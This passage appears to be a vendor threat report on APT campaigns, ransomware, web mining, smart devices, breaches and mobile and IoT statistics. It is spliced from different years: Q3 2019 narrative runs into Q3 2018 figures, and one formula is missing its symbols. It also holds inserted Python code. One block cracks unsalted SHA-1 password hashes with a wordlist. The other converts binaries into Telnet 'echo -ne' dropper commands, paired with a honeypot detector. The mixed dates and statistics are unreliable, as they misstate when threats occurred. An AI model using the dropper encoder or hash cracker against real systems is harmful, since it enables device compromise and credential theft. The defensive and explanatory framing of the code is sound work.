[here](<https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/>).

### CloudAtlas uses new infection chain

[Cloud Atlas](<https://securelist.com/recent-cloud-atlas-activity/92016/>) (aka Inception) has a long history of cyber-espionage operations targeting industries and government bodies. We first reported this group in 2014 and we have continued to track its activities. During the first half of this year, we identified campaigns focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.
Cloud Atlas hasn't changed its TTPs (Tactics, Techniques and Procedures) since 2018 and continues to rely on existing tactics and malware to compromise high value targets. The threat actor's Windows intrusion set still uses spear-phishing emails to target its victims: these are crafted with Office documents that use malicious remote templates \u2013 whitelisted per victim \u2013 hosted on remote servers. Previously, Cloud Atlas dropped its 'validator' implant, named PowerShower, directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. In recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed in 2014.\n\n### Dtrack banking malware discovered\n\nIn summer 2018, we discovered ATMDtrack, a piece of banking malware targeting banks in India. We used YARA and the Kaspersky Attribution Engine to try to uncover more information about this ATM malware; and we found more than 180 new malware samples of a spy tool that we now call Dtrack. All the Dtrack samples we initially found were dropped samples, as the real payload was encrypted with various droppers \u2013 we were able to find them because of the unique sequences shared by ATMDtrack and the Dtrack [memory dumps](<https://encyclopedia.kaspersky.com/glossary/dump/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Once we decrypted the final payload and used the Kaspersky Attribution Engine again, we saw similarities with the [DarkSeoul campaign](<https://unit42.paloaltonetworks.com/tdrop2-attacks-suggest-dark-seoul-attackers-return/>), dating back to 2013 and attributed to the Lazarus group. It seems that they reused part of their old code to attack the financial sector and research centers in India. 
Our telemetry indicates that the latest Dtrack activity was detected at the beginning of September 2019. This is a good example of how proper YARA rules and a solid working attribution engine can help to uncover connections with established malware families. In this case, we were able to add another family to the Lazarus group's arsenal: ATMDtrack and Dtrack. You can find our public report on Dtrack [here](<https://securelist.com/my-name-is-dtrack/93338/>).

## Other security news

### Sodin ransomware attacks MSPs

In April, the Sodin ransomware (aka Sodinokibi and REvil) caught our attention, not least because of the way it spread. The Trojan [exploited the CVE-2019-2725 vulnerability](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) to execute a PowerShell command on a vulnerable Oracle WebLogic server, allowing the attackers to upload a dropper to the server, which then installed the ransomware payload. Patches for this vulnerability were released in April, but at the end of June a similar vulnerability was discovered – CVE-2019-2729. Sodin also carried out [attacks on MSPs](<https://www.darkreading.com/attacks-breaches/attackers-exploit-msps-tools-to-distribute-ransomware/d/d-id/1335025>). In some cases, the attackers used the Webroot and Kaseya remote access consoles to deliver the Trojan. In others, [the attackers penetrated MSP infrastructure using an RDP connection](<https://www.reddit.com/r/msp/comments/c2wls0/kaseya_weaponized_to_deliver_sodinokibi_ransomware/>), elevated privileges, deactivated security solutions and backups and then downloaded the ransomware to client computers. This ransomware was also unusual because it didn't require the victim to carry out any action. Our statistics indicated that most victims were located in the Asia-Pacific region, including Taiwan, Hong Kong and South Korea.

Ransomware continues to be a major headache for consumers and businesses alike.
Recovering data that a ransomware Trojan has encrypted is often impossible. However, in some cases we are able to do so. Recent examples include the [Yatron and FortuneCrypt malware](<https://securelist.com/ransomware-two-pieces-of-good-news/93355/>). If you ever face a situation where a ransomware Trojan has encrypted your data, and you don't have a backup, it's always worth checking the [No More Ransom](<https://www.nomoreransom.org/>) site to see if a decryptor is available. You can find our decryptors for both of the above ransomware programs [here](<https://support.kaspersky.com/viruses/disinfection/10556>) and [here](<https://www.nomoreransom.org/en/decryption-tools.html>).

### The impact of web mining

[Malicious miners](<https://securelist.com/kaspersky-security-bulletin-2018-story-of-the-year-miners/89096/>) are programs designed to hijack the victim's CPU in order to mine crypto-currencies. The business model is simple: infect the computer, use the processing power of its [CPU](<https://en.wikipedia.org/wiki/Central_processing_unit>) or [GPU](<https://en.wikipedia.org/wiki/Graphics_processing_unit>) to generate coins and earn real-world money through legal exchanges and transactions. It's not obvious to the victim that they are infected – most people seldom use most of their computer's processing power and miners harness the 70-80% that is not being used for anything else. Miners can be installed along with adware, hacked games and other pirated content. However, there's also another model – using an embedded mining script that starts when the victim opens an infected web page. Where a corporate network has been infected, the CPU capacity available to the cybercriminals can be huge. But what impact does mining have?
We recently tried to quantify the economic and environmental impact of web miners, and thereby evaluate the benefit of protecting against mining.

The total power saving can be calculated using the formula ·N, where is the average value of the increase in power consumption of the victim's device during the web mining process, and N is the number of blocked attempts according to KSN ([Kaspersky Security Network](<https://www.kaspersky.com/ksn>)) data for 2018. This figure is equal to 18.8±11.8 gigawatts (GW) – twice the average power consumption rate of all Bitcoin miners in the same year. To assess the amount of saved energy based on this power consumption rate, this number is multiplied by the average time that victim devices spend on web mining; that is, according to the formula '·N·t', where 't' is the average time that web miners would have been working had they not been blocked by our products. Since this value cannot be obtained from Kaspersky data, we used information from open sources provided by third-party researchers, according to which the estimated amount of electricity saved by users of our products ranges from 240 to 1,670 megawatt hours (MWh). Using the average prices for individual consumers, this amount of electricity could cost up to $200,000 for residents in North America or up to €250,000 for residents in Europe.

You can read our report [here](<https://securelist.com/electricity-and-mining/93292/>).

### Mac OS threat landscape

Some people still believe that there are no serious threats for Mac OS. There are certainly fewer threats than for Windows, mainly because more people run Windows, so there is a bigger pool of potential victims for attackers to target. However, as the number of people running Mac OS has grown, so has the number of threats targeting them.

Our database currently contains 206,759 unique malicious and potentially unwanted files for Mac OS.
From 2012 to 2017, the number of people facing attack grew year by year, reaching a peak in 2017, when we blocked attacks on around 255,000 computers running Mac OS. Since then, there has been a drop; in the first half of 2019, we blocked around 87,000 attacks. The majority of threats for Mac OS in 2019 fell into the adware category – these threats are easier to create, offering a better return on investment for cybercriminals.

The number of phishing attacks targeting Mac OS has also increased year by year. During the first half of 2019, we detected nearly 6 million phishing attacks, 11.8% of which targeted corporate users. The countries facing the most phishing attacks were Brazil (30.87%), India (22.08%) and France (22.02%). The number of phishing attacks seeking to exploit the Apple brand name has also grown in recent years – by around 30-40% each year. In 2018, there were nearly 1.5 million such attacks; in the first half of 2019 alone, the number exceeded 1.6 million – already an increase of 9% over the whole of the previous year.

You can read our report on the current Mac OS threat landscape [here](<https://securelist.com/threats-to-macos-users/93116/>).

### Smart home vulnerabilities

One of our colleagues chose to turn his home into a smart home and installed a Fibaro Home Center system, so that he could remotely manage smart devices in the house, including lights, heating system, fridge, stereo system, sauna heater, smoke detectors, flood sensors, IP cameras and doorbell. He invited researchers from the [Kaspersky ICS CERT](<https://ics-cert.kaspersky.com/>) team to investigate it to see how secure it was. The researchers knew the model of the smart home hub and the IP address. They decided not to look at the Z-Wave protocol, which the smart home hub uses to talk to the appliances, because this required physical proximity to the house.
They also discarded the idea of exploiting the programming language interpreter – the Fibaro hub used a patched version.

Our researchers were able to find a remote SQL injection vulnerability, despite the efforts of Fibaro to avoid them, and a couple of remote code execution vulnerabilities in the PHP code. If exploited, these vulnerabilities would allow attackers to get root access rights on the smart hub, giving them full control over it. They also found a severe vulnerability in the Fibaro cloud that could allow an attacker to access all backups uploaded from Fibaro hubs around the world. This is how our research team acquired the backup data stored by the Fibaro Home Center located in this particular home. Among other things, this backup contains a database file with a lot of personal information, including the house's location, geo-location data from the owner's smartphone, the email address used to register with Fibaro, information about smart devices in the owner's home and even the owner's password. Credit to Fibaro Group not only for creating a rather secure product but also for working closely with our researchers to quickly patch the vulnerabilities we reported to them. You can read the full story [here](<https://securelist.com/fibaro-smart-home/91416/>).

### Security of smart buildings

This quarter we also looked at the [security of automation systems in buildings](<https://securelist.com/smart-buildings-threats/93322/>) – sensors and controllers to manage elevators, ventilation, heating, lighting, electricity, water supply, video surveillance, alarm systems, fire extinguishing systems and more in industrial facilities. Such systems are used not only in office and residential buildings but also in hospitals, shopping malls, prisons, industrial production, public transport and other places where large work and/or living areas need to be controlled.
We looked at the live threats to building-based automation systems to see what malware their owners encountered in the first six months of 2019.

Most of the blocked threats were neither targeted nor specific to building-based automation systems, but ordinary malware regularly found on corporate networks unrelated to automation systems. Such threats can still have a significant impact on the availability and integrity of automation systems, from file encryption (including databases) to denial of service on network equipment and workstations because of malicious traffic and unstable exploits. Spyware and backdoors pose a far greater threat, since stolen authentication data and the remote control they provide can be used to plan and carry out a subsequent targeted attack on a building's automation system.

### Smart cars and connected devices

Kaspersky has investigated smart car security several times in recent years ([here](<https://securelist.com/mobile-apps-and-stealing-a-connected-car/77576/>) and [here](<https://securelist.com/a-study-of-car-sharing-apps/86948/>)), revealing a number of security issues. As vehicles become smarter and more connected, they are also becoming more exposed. However, this doesn't just apply to smart cars and the apps that support them. There is now a whole industry of after-market devices designed to improve the driving experience – from car scanners to tuning gadgets. In a recent report, [we reviewed a number of automotive connected devices](<https://securelist.com/on-the-iot-road/91833/>) and examined their security setup. This exercise provided us with a first look at security issues in these devices. Our review included a couple of auto scanners, a dashboard camera, a GPS tracker, a smart alarm system and a pressure and temperature monitoring system.

We found the security of these devices more or less adequate, leaving aside minor issues.
This is partly due to the limited device functionality and a lack of serious consequences in the event of a successful attack. It's also due to the vigilance of vendors. However, as we move towards a more and more connected future, it's important to remember that the smarter an object is, the more attention should be paid to security in the development and updating of a device: careless development or an unpatched vulnerability could allow an attacker to hijack a victim's car or spy on an entire car fleet.

We continue to develop [KasperskyOS](<https://os.kaspersky.com/2019/05/20/kasperskyos-an-immune-based-approach-to-information-system-security/>), to help customers secure connected systems – including mobile devices and PCs, internet of things devices, intelligent energy systems, industrial systems, telecommunications systems and transportation systems.

If you're considering buying a device to make your car a little bit smarter, you should think about the security risks. Check to see if any vulnerabilities affect the device and whether it's possible to apply security updates to it. Don't automatically buy the most recently released product, since it might contain a security flaw that hasn't yet been discovered: the best choice is to buy a product that has already been updated several times. Finally, always consider the security of the 'mobile dimension' of the device, especially if you use an Android device: while applications make life easier, once a smartphone is hit by malware a lot can go wrong.

### Personal data theft

We've become used to a steady stream of reports in the news about data breaches. Recent examples include the [theft of 23,205,290 email addresses](<https://www.forbes.com/sites/daveywinder/2019/08/05/cafepress-hacked-23m-accounts-compromised-is-yours-one-of-them/#625d70cf407e>) together with passwords weakly stored as base64-encoded SHA-1 hashes from CafePress.
Worryingly, the hack was reported by [Have I Been Pwned](<https://haveibeenpwned.com>) – CafePress didn't notify its customers until some months after the breach had occurred.

In August, two Israeli [researchers discovered fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>). The exposure of biometric data is of particular concern. If a hacker is able to obtain my password, I can change it, but a biometric is for life.

[Facebook has faced criticism on several occasions for failing to handle customers' data properly](<https://www.kaspersky.com/blog/facebook-10-fails/26980/>). In the latest of a long list of incidents, hundreds of millions of [phone numbers linked to Facebook accounts were found online](<https://techcrunch.com/2019/09/04/facebook-phone-numbers-exposed/?guccounter=1>) on a server that wasn't protected with a password. Each record contained a unique Facebook ID and the phone number listed on the account, leaving affected Facebook customers open to spam calls and SIM-swap attacks.

On September 12, mobile gaming company [Zynga reported that some player account data may have been accessed illegally by 'outside hackers'](<https://www.scmagazine.com/home/security-news/the-word-is-out-zynga-was-breached/>). Subsequently, a hacker going by the name of Gnosticplayers claimed to have breached the player database of _Words With Friends_, as well as data from _Draw Something_ and the discontinued game _OMGPOP_, exposing the data of more than 200 million Android and iOS players. While Zynga spotted the breach and notified customers, it's worrying that passwords were stored in cleartext.

Consumers have no direct control over the security of the personal data they disclose to online providers.
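The CafePress and Zynga incidents above differ only in how badly the provider stored credentials. The Python below is an added illustration, not code from this report or from either company: it models the scheme the report attributes to CafePress (base64-encoded SHA-1; the example assumes no per-user salt, which the "weakly stored" wording implies but the report does not state) and shows why a leaked table of such hashes falls to a single dictionary pass, then contrasts it with a salted, iterated PBKDF2 record in which every user has to be attacked separately. The wordlist, usernames and passwords are constructed for the example.

```python
import base64
import hashlib
import hmac
import os

# Constructed stand-in for a leaked wordlist; real cracking runs use millions of entries.
WORDLIST = ["password", "123456", "letmein", "qwerty", "iloveyou", "sunshine"]


def legacy_hash(password: str) -> str:
    """Base64-encoded, unsalted SHA-1: the storage scheme the CafePress breach is described with."""
    return base64.b64encode(hashlib.sha1(password.encode("utf-8")).digest()).decode("ascii")


def crack_legacy(stored: dict, wordlist: list) -> dict:
    """Crack every user at once. Because nothing is salted, one SHA-1 per candidate word
    builds a lookup table that is reused across the whole leaked table."""
    table = {legacy_hash(word): word for word in wordlist}  # len(wordlist) hashes in total
    return {user: table[h] for user, h in stored.items() if h in table}


def pbkdf2_hash(password: str, iterations: int = 600_000, salt: bytes = b"") -> str:
    """Salted, iterated PBKDF2-HMAC-SHA256, stored as '$'-separated fields so the
    parameters travel with the record and the cost can be raised later without a migration.
    An empty salt argument means 'generate a fresh random one'."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join(["pbkdf2_sha256", str(iterations),
                     base64.b64encode(salt).decode("ascii"),
                     base64.b64encode(dk).decode("ascii")])


def verify_pbkdf2(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_b64, dk_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             base64.b64decode(salt_b64), int(iterations))
    return hmac.compare_digest(dk, base64.b64decode(dk_b64))


def kdf_calls_to_crack(stored: dict, wordlist: list) -> int:
    """Work against salted records: there is no shared table, so every (user, word) pair is
    a separate KDF evaluation, and each evaluation costs `iterations` HMAC computations."""
    return len(stored) * len(wordlist)


# Constructed leaked table: three users stored with the legacy scheme.
LEAKED = {
    "alice": legacy_hash("letmein"),
    "bob": legacy_hash("sunshine"),
    "carol": legacy_hash("T7#pq!v9Lz"),  # not in the wordlist, so it survives the dictionary pass
}

if __name__ == "__main__":
    print(crack_legacy(LEAKED, WORDLIST))            # {'alice': 'letmein', 'bob': 'sunshine'}
    record = pbkdf2_hash("letmein")
    print(verify_pbkdf2("letmein", record), verify_pbkdf2("Letmein", record))  # True False
    print(kdf_calls_to_crack(LEAKED, WORDLIST), "KDF evaluations for the same attack, salted")
```

The difference is not secrecy of the algorithm but cost per guess: the legacy table is broken with six SHA-1 calls regardless of how many users it holds, while the salted records need one full PBKDF2 run per user per candidate. A memory-hard KDF such as Argon2id or scrypt would be the choice for a new system; PBKDF2 is used here only because it ships in the standard library.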
However, we can limit the damage of a security breach at an online provider by creating passwords that are unique and hard to guess, or by using a password manager to do this for us. By making use of two-factor authentication, where offered by an online provider, we can further reduce the impact of any breach.

It's also worth bearing in mind that hacking the server of an online provider isn't the only way that cybercriminals can get their hands on passwords and other personal data. They also harvest data stored on a consumer's computer directly. This includes data stored in browsers, files from the hard disk, system data, account logins and more. Our data shows that 940,000 people were targeted by malware designed to steal such data in the first half of 2019. We would recommend using specialist software to store account passwords and bank card details, rather than relying on your browser. You can find out more about how cybercriminals target personal data on computers [here](<https://securelist.com/how-to-steal-a-million-of-your-data/91855/>).

_Source: [IT threat evolution Q3 2019](<https://securelist.com/it-threat-evolution-q3-2019/95268/>), Securelist, published 2019-11-29. CVEs referenced: CVE-2017-11882, CVE-2018-0802, CVE-2019-2725, CVE-2019-2729._

_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data._

## Q3 figures

According to Kaspersky Security Network:

 * Kaspersky Lab solutions blocked 947,027,517 attacks launched from online resources located in 203 countries.
 * 246,695,333 unique URLs were recognized as malicious by Web Anti-Virus components.
 * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 305,315 users.
 * Ransomware attacks were registered on the computers of 259,867 unique users.
 * Our File Anti-Virus logged 239,177,356 unique malicious and potentially unwanted objects.
 * Kaspersky Lab products for mobile devices detected:
   * 1,305,015 malicious installation packages
   * 55,101 installation packages for mobile banking Trojans
   * 13,075 installation packages for mobile ransomware Trojans.

## Mobile threats

### Q3 events

Perhaps the biggest news of the reporting period was the [Trojan-Banker.AndroidOS.Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) epidemic. It peaked in September, when more than 250,000 unique users were attacked – and that only includes statistics for those with Kaspersky Lab's mobile products installed on their devices.

_Number of users attacked by the mobile banker Asacub in 2017 and 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09145748/it-threat-evolution-q3-2018-statistics_01.png>)

The scale of the attack involving Asacub by far surpasses the largest attacks we have previously observed while monitoring mobile threats. The Trojan's versions have sequential version numbers, suggesting the attacks were launched by just one threat actor. It's impossible to count the total number of affected users, but it would need to be in the tens of thousands to make such a massive malicious campaign profitable.

### Mobile threat statistics

In Q3 2018, Kaspersky Lab detected **1,305,015** malicious installation packages, which is 439,229 fewer packages than in the previous quarter.

_Number of detected malicious installation packages, Q3 2017 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150155/it-threat-evolution-q3-2018-statistics_02.png>)

#### Distribution of detected mobile apps by type

Among all the threats detected in Q3 2018, the lion's share belonged to potentially unwanted RiskTool apps (52.05%); compared to the previous quarter, their share decreased by 3.3 percentage points (p.p.). Members of the RiskTool.AndroidOS.SMSreg family contributed most to this.

_Distribution of newly detected mobile apps by type, Q2 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/12081111/it-threat-evolution-q3-2018-statistics_03.png>)

Second place was occupied by Trojan-Dropper threats (22.57%), whose share increased by 9 p.p.
Most files of this type belonged to the Trojan-Dropper.AndroidOS.Piom, Trojan-Dropper.AndroidOS.Wapnor and Trojan-Dropper.AndroidOS.Hqwar families.

The share of advertising apps continued to decrease and accounted for 6.44% of all detected threats (compared to 8.91% in Q2 2018).

The statistics show that the number of mobile financial threats has been rising throughout 2018, with the proportion of mobile banker Trojans increasing from 1.5% of all detected threats in Q1 to 4.38% in Q3.

**TOP 20 mobile malware**

| | Verdicts* | %** |
|---|---|---|
| 1 | DangerousObject.Multi.Generic | 55.85 |
| 2 | Trojan.AndroidOS.Boogr.gsh | 11.39 |
| 3 | Trojan-Banker.AndroidOS.Asacub.a | 5.28 |
| 4 | Trojan-Banker.AndroidOS.Asacub.snt | 5.10 |
| 5 | Trojan.AndroidOS.Piom.toe | 3.23 |
| 6 | Trojan.AndroidOS.Dvmap.a | 3.12 |
| 7 | Trojan.AndroidOS.Triada.dl | 3.09 |
| 8 | Trojan-Dropper.AndroidOS.Tiny.d | 2.88 |
| 9 | Trojan-Dropper.AndroidOS.Lezok.p | 2.78 |
| 10 | Trojan.AndroidOS.Agent.rt | 2.74 |
| 11 | Trojan-Banker.AndroidOS.Asacub.ci | 2.62 |
| 12 | Trojan-Banker.AndroidOS.Asacub.cg | 2.51 |
| 13 | Trojan-Banker.AndroidOS.Asacub.ce | 2.29 |
| 14 | Trojan-Dropper.AndroidOS.Agent.ii | 1.77 |
| 15 | Trojan-Dropper.AndroidOS.Hqwar.bb | 1.75 |
| 16 | Trojan.AndroidOS.Agent.pac | 1.61 |
| 17 | Trojan-Dropper.AndroidOS.Hqwar.ba | 1.59 |
| 18 | Exploit.AndroidOS.Lotoor.be | 1.55 |
| 19 | Trojan.AndroidOS.Piom.uwp | 1.48 |
| 20 | Trojan.AndroidOS.Piom.udo | 1.36 |

_* This malware rating does not include potentially dangerous or unwanted programs such as RiskTool or adware._
_** Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._

First place in our TOP 20 once again went to DangerousObject.Multi.Generic (55.85%), the verdict we use for malware that's detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>).
Cloud technologies work when antivirus databases do not yet contain the data to detect a malicious program but the company's cloud antivirus database already includes information about the object. This is basically how the very latest malicious programs are detected.

In second place was Trojan.AndroidOS.Boogr.gsh (11.39%). This verdict is given to files that our system recognizes as malicious based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).

Third and fourth places went to representatives of the Asacub mobile banker family – Trojan-Banker.AndroidOS.Asacub.a (5.28%) and Trojan-Banker.AndroidOS.Asacub.snt (5.10%).

#### Geography of mobile threats

_Map of attempted infections using mobile malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151353/it-threat-evolution-q3-2018-statistics_04_en.png>)

**TOP 10 countries by share of users attacked by mobile malware:**

| | Country* | %** |
|---|---|---|
| 1 | Bangladesh | 35.91 |
| 2 | Nigeria | 28.54 |
| 3 | Iran | 28.07 |
| 4 | Tanzania | 28.03 |
| 5 | China | 25.61 |
| 6 | India | 25.25 |
| 7 | Pakistan | 25.08 |
| 8 | Indonesia | 25.02 |
| 9 | Philippines | 23.07 |
| 10 | Algeria | 22.88 |

_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._
_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._

In Q3 2018, Bangladesh (35.91%) retained first place in terms of the share of mobile users attacked. Nigeria (28.54%) came second. Third and fourth places were claimed by Iran (28.07%) and Tanzania (28.03%) respectively.

### Mobile banking Trojans

During the reporting period, we detected **55,101** installation packages for mobile banking Trojans, which is nearly 6,000 fewer than in Q2 2018.

The largest contribution was made by the verdict Trojan-Banker.AndroidOS.Hqwar.jck, which was assigned to 35% of all detected banking Trojans. Trojan-Banker.AndroidOS.Asacub came second, accounting for 29%.

_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q3 2017 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150645/it-threat-evolution-q3-2018-statistics_05.png>)

| | Verdicts | %* |
|---|---|---|
| 1 | Trojan-Banker.AndroidOS.Asacub.a | 33.27 |
| 2 | Trojan-Banker.AndroidOS.Asacub.snt | 32.16 |
| 3 | Trojan-Banker.AndroidOS.Asacub.ci | 16.51 |
| 4 | Trojan-Banker.AndroidOS.Asacub.cg | 15.84 |
| 5 | Trojan-Banker.AndroidOS.Asacub.ce | 14.46 |
| 6 | Trojan-Banker.AndroidOS.Asacub.cd | 6.66 |
| 7 | Trojan-Banker.AndroidOS.Svpeng.q | 3.25 |
| 8 | Trojan-Banker.AndroidOS.Asacub.cf | 2.07 |
| 9 | Trojan-Banker.AndroidOS.Asacub.bz | 1.68 |
| 10 | Trojan-Banker.AndroidOS.Asacub.bw | 1.68 |

_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._

In Q3 2018, the TOP 10 rating of banking threats was almost exclusively (nine places out of 10) occupied by various versions of Trojan-Banker.AndroidOS.Asacub.

_Geography of mobile banking threats, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151425/it-threat-evolution-q3-2018-statistics_06_en.png>)

**TOP 10 countries by share of users attacked by mobile banking Trojans:**

| | Country* | %** |
|---|---|---|
| 1 | Russia | 2.18 |
| 2 | South Africa | 2.16 |
| 3 | Malaysia | 0.53 |
| 4 | Ukraine | 0.41 |
| 5 | Australia | 0.39 |
| 6 | China | 0.35 |
| 7 | South Korea | 0.33 |
| 8 | Tajikistan | 0.30 |
| 9 | USA | 0.27 |
| 10 | Poland | 0.25 |

_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._
_** 
Unique users in the country attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._

In Q3 2018, Russia ended up in first place in this TOP 10 because of the mass attacks involving the Asacub Trojan. The USA, the previous quarter's leader, fell to ninth (0.27%) in Q3. Second and third places were occupied by South Africa (2.16%) and Malaysia (0.53%) respectively.

### Mobile ransomware Trojans

In Q3 2018, we detected **13,075** installation packages for mobile ransomware Trojans, which is 1,044 fewer than in Q2.

_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q3 2017 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150710/it-threat-evolution-q3-2018-statistics_07.png>)

| | Verdicts | %* |
|---|---|---|
| 1 | Trojan-Ransom.AndroidOS.Svpeng.ag | 47.79 |
| 2 | Trojan-Ransom.AndroidOS.Svpeng.ah | 26.55 |
| 3 | Trojan-Ransom.AndroidOS.Zebt.a | 6.71 |
| 4 | Trojan-Ransom.AndroidOS.Fusob.h | 6.23 |
| 5 | Trojan-Ransom.AndroidOS.Rkor.g | 5.50 |
| 6 | Trojan-Ransom.AndroidOS.Svpeng.snt | 3.38 |
| 7 | Trojan-Ransom.AndroidOS.Svpeng.ab | 2.15 |
| 8 | Trojan-Ransom.AndroidOS.Egat.d | 1.94 |
| 9 | Trojan-Ransom.AndroidOS.Small.as | 1.43 |
| 10 | Trojan-Ransom.AndroidOS.Small.cj | 1.23 |

_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus attacked by ransomware Trojans._

In Q3 2018, the most widespread mobile ransomware Trojans belonged to the Svpeng family – Trojan-Ransom.AndroidOS.Svpeng.ag (47.79%) and Trojan-Ransom.AndroidOS.Svpeng.ah (26.55%). Together, they accounted for three quarters of all mobile ransomware Trojan attacks.
The once-popular families Zebt and Fusob were a distant third and fourth, represented by Trojan-Ransom.AndroidOS.Zebt.a (6.71%) and Trojan-Ransom.AndroidOS.Fusob.h (6.23%) respectively.

_Geography of mobile ransomware Trojans, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151458/it-threat-evolution-q3-2018-statistics_08_en.png>)

**TOP 10 countries by share of users attacked by mobile ransomware Trojans:**

| | Country* | %** |
|---|---|---|
| 1 | USA | 1.73 |
| 2 | Kazakhstan | 0.36 |
| 3 | China | 0.14 |
| 4 | Italy | 0.12 |
| 5 | Iran | 0.11 |
| 6 | Belgium | 0.10 |
| 7 | Switzerland | 0.09 |
| 8 | Poland | 0.09 |
| 9 | Mexico | 0.09 |
| 10 | Romania | 0.08 |

_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._
_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._

Just like in Q2, first place in the TOP 10 went to the United States (1.73%). Kazakhstan (0.36%) rose one place to second in Q3, while China (0.14%) rose from seventh to third.

## Attacks on IoT devices

In this quarter's report, we decided to only present the statistics for Telnet attacks, as this type of attack is used most frequently and employs the widest variety of malware types.
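Telnet is attractive to IoT attackers because a successful login gives command execution, but the protocol has no file-transfer primitive: a dropper has to be written to disk by echoing escaped bytes (`echo -ne "\x7f\x45\x4c\x46..."`) a chunk at a time, which is why the first-stage payloads carried this way stay tiny. The Python below is an added example, not code from this report or from any of the malware families it names. `to_echo_commands` reproduces the attacker side for an arbitrary payload, and `reassemble` and `flag_elf_drops` show the defender side: rebuilding every file written during a captured honeypot session and flagging those that begin with the ELF magic. The payload, the session transcript, the chunk size and the `/tmp/.x` path are all constructed for the example.

```python
import re

ELF_MAGIC = b"\x7fELF"


def to_echo_commands(payload: bytes, path: str, chunk: int = 128) -> list:
    """Attacker side: turn a binary into shell commands a Telnet session can carry.
    The first command truncates the target file, the rest append; `chunk` bounds the
    length of each line, since the minimal shells on IoT devices reject very long input."""
    cmds = []
    for offset in range(0, len(payload), chunk):
        escaped = "".join(f"\\x{b:02x}" for b in payload[offset:offset + chunk])
        redirect = ">" if offset == 0 else ">>"
        cmds.append(f'echo -ne "{escaped}" {redirect} {path}')
    return cmds


# One echo -ne write: the escaped bytes, the redirect operator and the target path.
_ECHO_RE = re.compile(r'echo\s+-ne\s+"((?:\\x[0-9a-fA-F]{2})+)"\s*(>>?)\s*(\S+)')


def reassemble(session: str) -> dict:
    """Defender side: replay every echo -ne write seen in a captured session and
    return the files it would have produced, keyed by path."""
    files = {}
    for m in _ECHO_RE.finditer(session):
        data = bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", m.group(1)))
        redirect, path = m.group(2), m.group(3)
        files[path] = data if redirect == ">" else files.get(path, b"") + data
    return files


def flag_elf_drops(session: str) -> list:
    """Paths written in the session whose reassembled content starts with the ELF header."""
    return sorted(path for path, data in reassemble(session).items() if data.startswith(ELF_MAGIC))


# Constructed stand-in for a small dropper: a valid ELF magic/ident followed by filler bytes.
SAMPLE_PAYLOAD = b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8 + bytes(range(256)) + b"NYADROP-SAMPLE"
SAMPLE_PATH = "/tmp/.x"  # placeholder path, chosen for the example

# Constructed honeypot transcript: login noise, the byte-by-byte drop, chmod, execution.
SAMPLE_SESSION = "\n".join(
    ["enable", "system", "shell", "sh", "cd /tmp"]
    + to_echo_commands(SAMPLE_PAYLOAD, SAMPLE_PATH, chunk=32)
    + [f"chmod +x {SAMPLE_PATH}", SAMPLE_PATH]
)

if __name__ == "__main__":
    print(len(to_echo_commands(SAMPLE_PAYLOAD, SAMPLE_PATH, chunk=32)), "echo commands for",
          len(SAMPLE_PAYLOAD), "bytes")
    print(flag_elf_drops(SAMPLE_SESSION))  # ['/tmp/.x']
```

Run over real honeypot logs, the reassembled bytes can be hashed and matched against known droppers, and the ratio of payload size to command count makes it obvious why a 60 KB bot is fetched by a 480-byte stager rather than typed in directly.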

| Service | Share |
|---|---|
| Telnet | 99.4% |
| SSH | 0.6% |

_The popularity of attacked services according to the number of unique IP addresses from which attacks were launched, Q3 2018_

### Telnet attacks

